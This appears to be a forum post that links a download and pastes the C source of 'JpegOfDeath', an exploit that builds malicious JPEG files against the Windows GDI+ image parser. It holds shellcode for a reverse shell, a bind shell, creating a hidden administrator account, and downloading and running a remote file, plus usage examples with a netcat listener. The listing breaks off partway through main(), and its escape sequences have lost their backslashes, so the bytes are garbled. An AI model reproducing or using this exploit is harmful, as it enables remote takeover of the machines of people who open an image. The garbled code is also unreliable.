bossjuan

jpegadmin


http://rapidshare.de/files/25029686/jpegadmin.rar.html

si exploit-ul

Exploit:

/*

* Exploit Name:

* =============

* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload

* =============

* Tweaked Exploit By M4Z3R For GSO

* All Credits & Greetings Go To:

* ==========

* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack

* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,

* Nick Fitzgerald, Adam Nance (where are you?),

* Santa Barbara, Jenna Jameson, John Kerry, so1o,

* Computer Security Industry, Rom Hackers, My chihuahuas

* (Rocky, Sailor, and Penny)...

* ===========

* Flags Usage:

* -a: Add User X with Pass X to Admin Group;

* IE: Exploit.exe -a pic.jpg

* -d: Download a File From an HTTP Server;

* IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg

* -r: Send Back a Shell To a Specified IP on a Specific Port;

* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)

* -b: Bind a Shell on The Exploited Machine On a Specific Port;

* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

* Disclaimer:

* ===========

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR

* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES

* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.

* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,

* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT

* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,

* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY

* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT

* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF

* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE

*

*/

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <windows.h>

#pragma comment(lib, "ws2_32.lib")



// Exploit Data...



// Payload emitted in -r mode (attack_mode == 1 in main()).  The bytes are
// opaque machine code; nothing in this file decodes them, so only the spots
// main() patches are documented: indices 179..182 receive the XOR-encoded
// IPv4 octets, 184/185 two fixed bytes, and 186/187 the XOR-encoded upper
// bytes of encoded_port.
// NOTE(review): as pasted here the string escapes carry no backslash prefix,
// so the byte values shown cannot be taken at face value.
char reverse_shellcode[] =

"xD9xE1xD9x34"

"x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"

"x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"

"x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"

"x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"

"xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"

"x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"

"x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"

"x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"

"xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"

"x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"

"xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"

"xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"

"x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"

"xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"

"xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"

"xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"

"xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"

"xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"

"x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"

"x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"

"x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"

"x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"

"x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";



// Payload emitted in -b mode (attack_mode == 2, which is also the default).
// Opaque machine code; main() patches indices 204/205 with two fixed bytes
// and 191/192 with the XOR-encoded upper bytes of encoded_port.
char bind_shellcode[] =

"xD9xE1xD9x34x24x58x58x58"

"x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"

"xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"

"x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"

"x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"

"x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"

"x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"

"x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"

"xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"

"x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"

"x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"

"x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"

"xA3x6DxC5xC5xFAx90x92x83xCEx1Bx74xF8x82xC4xC1x6D"

"xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"

"x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"

"x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"

"x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"

"xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"

"x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"

"xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"

"xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"

"x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"

"x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"

"x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"

"x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";



// Payload prefix for -d mode (attack_mode == 4).  main() copies it into
// newshellcode, then appends argv[2] and a one-byte terminator string before
// the buffer is written.  The trailing "m00!" literal is part of the array.
char http_shellcode[]=

"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"

"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"

"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"

"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"

"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"

"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"

"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"

"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"

"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"

"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"

"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"

"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"

"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"

"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"

"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"

"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"

"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"

"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"

"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"

"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"

"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"

"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"

"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"

"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"

"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"

"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"

"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"

"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"

"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"

"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"

"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"

"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"

"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"

"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"

"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"

"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"

"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"

"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"

"x27x39x72x6Fx72x17"

"m00!";



// Payload emitted in -a mode (attack_mode == 3) and also appended after
// newshellcode in -d mode.  Opaque machine code; main() never patches it.
char admin_shellcode[] =

"x66x81xecx80x00x89xe6xe8xb7x00x00x00x89x06x89xc3"

"x53x68x7exd8xe2x73xe8xbdx00x00x00x89x46x0cx53x68"

"x8ex4ex0execxe8xafx00x00x00x89x46x08x31xdbx53x68"

"x70x69x33x32x68x6ex65x74x61x54xffxd0x89x46x04x89"

"xc3x53x68x5exdfx7cxcdxe8x8cx00x00x00x89x46x10x53"

"x68xd7x3dx0cxc3xe8x7ex00x00x00x89x46x14x31xc0x31"

"xdbx43x50x68x72x00x73x00x68x74x00x6fx00x68x72x00"

"x61x00x68x73x00x74x00x68x6ex00x69x00x68x6dx00x69"

"x00x68x41x00x64x00x89x66x1cx50x68x58x00x00x00x89"

"xe1x89x4ex18x68x00x00x5cx00x50x53x50x50x53x50x51"

"x51x89xe1x50x54x51x53x50xffx56x10x8bx4ex18x49x49"

"x51x89xe1x6ax01x51x6ax03xffx76x1cx6ax00xffx56x14"

"xffx56x0cx56x6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"

"xadx8bx40x08x5exc2x04x00x53x55x56x57x8bx6cx24x18"

"x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01"

"xebxe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38"

"xe0x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1"

"x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04"

"x8bx01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00";



// First fixed section of the output file in modes 1, 2 and 4; main() writes
// it before setNOPs1 and header2 and counts its sizeof (minus the NUL) into
// the starting offset of the 0x90 padding.
char header1[] =

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"

"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"

"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"

"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"

"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"

"x2Ex3Ex35x35x35x35x35x3E";



// Second fixed section for modes 1, 2 and 4, written right after header1.
// The same bytes also appear at the tail of admin_header5.
char setNOPs1[] =

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



// Tail section for modes 1, 2 and 4.  main() pads with 0x90 until this
// section fits below offset 0x1000 and then writes it, stopping at 0x1000.
char setNOPs2[] =

"x3ExE8x00x00x00x00x5Bx8Dx8B"

"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



// Third fixed section for modes 1, 2 and 4, written after setNOPs1.  Its
// sizeof, together with header1 and setNOPs1, fixes where the 0x90 padding
// starts in main().
char header2[] =

"x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"

"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"

"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"

"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"

"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"

"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"

"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"

"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"

"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"

"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"

"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"

"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"

"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"

"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"

"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"

"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"

"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"

"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"

"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"

"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"

"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"

"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"

"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"

"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"

"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"

"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"

"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"

"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"

"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"

"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"

"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"

"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"

"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"

"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"

"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"

"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"

"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"

"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"

"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"

"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"

"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"

"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"

"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"

"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"

"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"

"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"

"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"

"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"

"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"

"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"

"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"

"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"

"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"

"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"

"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"

"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"

"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"

"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"

"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"

"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"

"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"

"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"

"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"

"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"

"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"

"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"

"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"

"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"

"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"

"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"

"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68";



// Fixed sections for -a mode (attack_mode == 3).  main() writes
// admin_header0 through admin_header6 in order, then 1601 filler bytes,
// then admin_shellcode.  None of these is patched at run time.
char admin_header0[]=

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64x00x60x00x00"

"xFFxECx00x11x44x75x63x6Bx79x00x01x00x04x00x00x00x0Ax00x00"

"xFFxEEx00x0Ex41x64x6Fx62x65x00x64xC0x00x00x00x01"
;



// -a mode, second fixed section (written after admin_header0).
char admin_header1[]=

"xFFxFEx00x01"
;



// -a mode, third fixed section.
char admin_header2[]=

"x00x14x10x10x19x12x19x27x17x17x27x32"
;



// -a mode, fourth fixed section.
char admin_header3[]=

"xEBx0Fx26x32"
;



// -a mode, fifth fixed section.
char admin_header4[]=

"xDCxB1xE7x70"
;



// -a mode, sixth fixed section.  Its last two string pieces are the same
// bytes as setNOPs1.
char admin_header5[]=

"x26x2Ex3Ex35x35x35x35x35x3E"

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"
;



// -a mode, seventh and last fixed section; main() follows it with 1601
// filler bytes and then admin_shellcode.
char admin_header6[]=

"x00x00x00xFFxDBx00x43x00x08x06x06x07x06x05x08x07x07"

"x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14"

"x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1C"

"x1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3C"

"x2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0D"

"x0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32xFFxC0x00x11x08x00x03x00x03x03x01x22"

"x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01"

"x01x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05"

"x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03x02"

"x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00x04x11x05"

"x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1x08"

"x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17"

"x18x19x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43"

"x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64"

"x65x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85"

"x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4"

"xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3"

"xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1"

"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8"

"xF9xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01"

"x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0A"

"x0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07x05x04"

"x04x00x01x02x77x00x01x02x03x11x04x05x21x31x06x12x41"

"x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09x23"

"x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19"

"x1Ax26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47"

"x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68"

"x69x6Ax73x74x75x76x77x78x79x7Ax82x83x84x85x86x87x88"

"x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7"

"xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6"

"xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5"

"xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00"

"x0Cx03x01x00x02x11x03x11x00x3Fx00xF9xFEx8Ax28xA0x0F"
;



// Code...

// Scratch buffer for -d mode: http_shellcode + argv[2] + terminator are
// strcat'ed into it.  File scope, so it starts zero-filled; main() writes
// sizeof - 1 (2047) bytes of it regardless of how much was filled.
// NOTE(review): the strcat calls in main() perform no length check.
char newshellcode[2048];



// Encode one byte with the fixed single-byte XOR key the payloads expect.
// Applying the function twice yields the original byte.
//
// byte: value to encode.
// Returns byte XOR 0x92.
unsigned char xor_data(unsigned char byte)
{
    const unsigned char key = 0x92;
    unsigned char encoded = (unsigned char)(byte ^ key);
    return encoded;
}



// Print the command-line help to stdout and terminate the process.
//
// prog_name: argv[0], substituted into the example command lines.
// Does not return: ends with exit(-1).
// NOTE(review): several of the help literals below span physical lines
// exactly as they appear in the source listing.
void print_usage(char *prog_name)
{
    FILE *out = stdout;

    fputs(" Exploit Usage:n", out);
    fprintf(out, "t%s -r your_ip | -b [-p port] <jpeg_filename>nn", prog_name);
    fputs("ttt -a | -d <source_file> <jpeg_filename>nn", out);
    fputs(" Parameters:nn", out);
    fputs("t-r your_ip or -bt Choose -r for reverse connect attack modenttttand choose -b for a bind attack.

By defaultntttt if you don't specify -r or-b then a bindntttt attack will be generated.nn", out);
    fputs("t-a or -dtt The -a flag will create a user X with pass X, ntttt on the admin localgroup. The -d flag,

willntttt execute the source http path of the filentttt given.n", out);
    fputs("nt-p (optional)tt This option will allow you to change the port ntttt used for a bind or reverse

connect attack.ntttt If the attack mode is bindthen thentttt victim will open the -p port. If the

attackntttt modeis reverse connect then the port yountttt specify will be the one you wantto listen

ntttt on so the victim can connect to yountttt right away.nn", out);
    fputs(" Examples:n", out);
    fprintf(out, "t%s -r 68.6.47.62 -p 8888 test.jpgn", prog_name);
    fprintf(out, "t%s -b -p 1542 myjpg.jpgn", prog_name);
    fprintf(out, "t%s -a whatever.jpgn", prog_name);
    fprintf(out, "t%s -d [url]http://webserver.com/patch.exe[/url] exploit.jpgnn", prog_name);
    fputs(" Remember if you use the -r option to have netcat listeningn", out);
    fputs(" on the port you are using for the attack so the victim willn", out);
    fputs(" be able to connect to you when exploited...nn", out);
    fputs(" Example:n", out);
    fputs("tnc.exe -l -p 8888", out);

    // Help is only shown on a usage error, so the process ends here.
    exit(-1);
}



// Entry point: parse the command line, patch the selected payload with the
// caller's port / IPv4 address where that mode needs it, and write the
// crafted file.  attack_mode: 1 = -r reverse connect, 2 = -b bind (default),
// 3 = -a add admin user, 4 = -d download from argv[2].  The last argument is
// always taken as the output filename.
//
// Returns EXIT_SUCCESS after writing, EXIT_FAILURE if the output file cannot
// be opened; print_usage() and the Winsock check call exit(-1) directly.
//
// NOTE(review): argv[i+1] (after -r / -p) and argv[2] (for -d) are read
// without checking that those indexes exist, and the option loop starts at
// argv[0], so the program name itself is inspected for a leading '-'.
int main(int argc, char *argv[])

{

FILE *fout;

unsigned int i = 0,j = 0; // i: argv index, later the running byte count; j: file offset bookkeeping

int raw_num = 0; // one parsed IPv4 octet

unsigned long port = 1337; // default port for bind and reverse attacks

unsigned long encoded_port = 0; // htonl(port) + 2; its upper two bytes are XOR-encoded into the payload

unsigned long encoded_ip = 0; // NOTE(review): never assigned or read after this line

unsigned char attack_mode = 2; // bind by default

char *p1 = NULL, *p2 = NULL; // cursors for the dotted-quad parse in -r mode

char ip_addr[256]; // filled only by -r; NOTE(review): the 20-byte strncpy below does not guarantee a NUL

char str_num[16]; // scratch for one octet; NOTE(review): never NUL-terminated, so atoi() can read past the copied digits

char jpeg_filename[256]; // copy of the output name, used only for the final message

WSADATA wsa;



printf(" +------------------------------------------------+n");

printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |n");

printf(" | Exploit by John Bissell A.K.A. HighT1mes |n");

printf(" | TweaKed By M4Z3R For GSO |n");

printf(" | September, 23, 2004 |n");

printf(" +------------------------------------------------+n");



if (argc < 2)

print_usage(argv[0]); // does not return





// process commandline

for (i = 0; i < (unsigned) argc; i++)

{



if (argv[i][0] == '-')

{



switch (argv[i][1])

 {

 

 // reverse connect

 case 'r':

 strncpy(ip_addr, argv[i+1], 20); // count is shorter than the buffer; no terminator is added

  attack_mode = 1;

 break;

 

 // bind

 case 'b':

  attack_mode = 2;

 break;

 

 // Add.Admin

 case 'a':

  attack_mode = 3;

 break;



 // DL

 case 'd':

  attack_mode = 4;

 break;



 // port

 case 'p':

 port = atoi(argv[i+1]); // no range check; atoi() yields 0 on non-numeric input

 break;

 }

}

}



// After the loop i == argc, so argv[i-1] is the last argument: the output path.

strncpy(jpeg_filename, argv[i-1], 255);

fout = fopen(argv[i-1], "wb");

     

if( !fout ) {

printf("Error: JPEG File %s Not Created!n", argv[i-1]);

return(EXIT_FAILURE);

}



 // initialize the socket library

 // No socket is ever opened; presumably this is for htonl() below — confirm.

if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {

printf("Error: Winsock didn't initialize!n");

exit(-1);

}



// Byte-swap the port, then add 2.  Only bits 16..31 of the result are used
// by the patches below; the file gives no explanation for the +2.

encoded_port = htonl(port);

encoded_port += 2;



if (attack_mode == 1)

{



 // reverse connect attack

 // Two fixed bytes at 184/185, then the two upper bytes of encoded_port,
 // XOR-encoded, at 186/187.

reverse_shellcode[184] = (char) 0x90;

reverse_shellcode[185] = (char) 0x92;

reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));

reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));



